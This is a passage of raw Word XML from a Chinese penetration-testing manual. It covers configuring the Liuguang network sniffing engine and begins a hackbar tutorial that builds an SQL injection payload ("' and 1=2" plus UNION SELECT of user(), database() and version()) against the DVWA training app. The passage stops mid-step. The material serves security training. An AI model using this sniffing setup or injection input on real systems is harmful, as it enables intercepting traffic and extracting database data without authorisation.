          <w:b/>
        </w:rPr>
        <w:t>设置嗅探参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接到嗅探引擎主机后，进入设置部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C104E3A" wp14:editId="7895DB70">
            <wp:extent cx="4476190" cy="3704762"/>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76190" cy="3704762"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:horzAnchor="margin" w:tblpY="240"/>
        <w:tblW w:w="6660" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6660"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="365"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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选项说明（选项以选中为例进行说明）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="708"/>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rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网卡</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>选择需要嗅探的网卡，在某些系统中往往安装了多块网卡，选择不同的网卡，可以对不同的网络区域进行嗅探。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="365"/>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Start IP</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：嗅探开始的</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="354"/>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End IP</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：嗅探结束的</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="365"/>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Gateway: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网关地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="354"/>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Protocol: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>选择嗅探的</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>TCP</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或者</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>UDP</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据包，根据选项的不同，下面出现的协议列表会不同。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="365"/>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 xml:space="preserve">Connect: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>开始连接指定的嗅探主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="354"/>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Receive if (Not)Contain Keywords</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：仅仅接收（不）包含指定关键字的数据包</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="365"/>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Buffer</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：缓冲区长度，当缓冲区满了以后，会自动写入指定的记录文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="365"/>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6D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="00A749FC">
            <w:r w:rsidRPr="003E3E5A">
              <w:t>LogFile</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：记录的嗅探文件，文件名</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数字的形式线性增长。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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 w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当选择了网卡以后，</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Start IP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>End IP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会根据网卡的设置变化，通常情况下</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址不用更改。</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Start IP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>End IP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的范围必须在网卡设置的范围内。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ips：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不要指定太大的</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>范围，通常情况下宽带接入不要超过</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，局域网不要超过</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>255</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，否则流量太大，在某些情况下会引起安装嗅探引擎主机当机。</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据需要选择需要嗅探的协议，只有被选中的协议类型才会被发送回客户界面。考虑这一点的关键和流光和嗅探引擎的连接速度有关。</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    如果指定关键字，则只会收到含有（或者不含有）指定关键字的数据包，这样也可以减少数据传输的流量。每一个关键字用</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>”;”</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>间隔。</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:br/>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 遵循以上的规则，可以保证整个嗅探的可靠性和稳定性，请根据实际情况进行设置，嗅探的数据并不是越多越好，而是在于数据的质量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置完成后，按下［</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>］，进入嗅探的主界面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>开始嗅探</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>嗅探监控的主界面：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="281045C2" wp14:editId="1350F6E0">
            <wp:extent cx="4828571" cy="3904762"/>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828571" cy="3904762"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按下</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>[Start]</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就可以通知嗅探引擎开始工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="241BA939" wp14:editId="5437ABE0">
            <wp:extent cx="4876190" cy="3876190"/>
            <wp:effectExtent l="0" t="0" r="63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76190" cy="3876190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区域</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>1：嗅探到的数据包列表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区域</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>2：显示选中的数据包。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区域</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>3：控制台输出，用于查看嗅探引擎的工作情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区域</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>4：嗅探网络的流量统计。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="00832CE1">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc499884729"/>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件-hackbar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Firefox在渗透测试中是一件非常强大的利器</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>以其众多优良的渗透插件支撑了各种渗透技术。其中，hackbar就是一种便于渗透测试人员开展SQL注入、XSS、CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、URL编码逃逸</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>等测试工作的必备工具</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，网上关于hackbar使用的教程很少，所以这里就个人之前使用的情况，结合DVWA来介绍下hackbar在web安全测试中的应用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>准备工作：安装部署好DVWA并将其Security</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Level设为low。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="00832CE1">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc499884730"/>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ackbar在sql注入方面的功能比较简单，主要作用在于针对不同类型的数据库提供了一些转码工具和自动语句，而关于sql注入最核心的注入点查找和查询语句构造还是需要测试者自己来完成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76C984BE" wp14:editId="2BF65B18">
            <wp:extent cx="4619275" cy="17240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22429" cy="1725202"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于本章目的是介绍hackbar使用，所以对DWVA的sql注入点查找和语句构造我们就不做赘述，假设我们已经知道DVWA</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Injection页面的表单存在漏洞，根据User</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID查询的结果值有两列且First name处显示结果为查询结果第一列的值，surname处显示结果为查询结果第二列的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25117B1E" wp14:editId="2AACE7BF">
            <wp:extent cx="4757773" cy="2247900"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="232" name="图片 232" descr="http://up.2cto.com/2013/0723/2013072309271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3/0723/20130723092716133.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59627" cy="2248776"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4643468E" wp14:editId="1DF689F5">
            <wp:extent cx="4757420" cy="1075908"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="233" name="图片 233" descr="http://up.2cto.com/2013/0723/2013072309271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3/0723/20130723092717843.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69777" cy="1078703"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着通过load</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url将查询user</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的url copy到hackbar中（如下），然后根据上面的分析利用user(),database()，version()三个内置函数构造union</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select语句来获得连接数据库的账户信息、数据库名称、数据库版本信息，具体步骤为在hackbar url中id=</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后添加“</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve">’ and 1=2 </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”,接着点击SQL-Union</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>statement，输入2，选中url中的“</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,2”后点击“SQL-Mysql-Basic</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
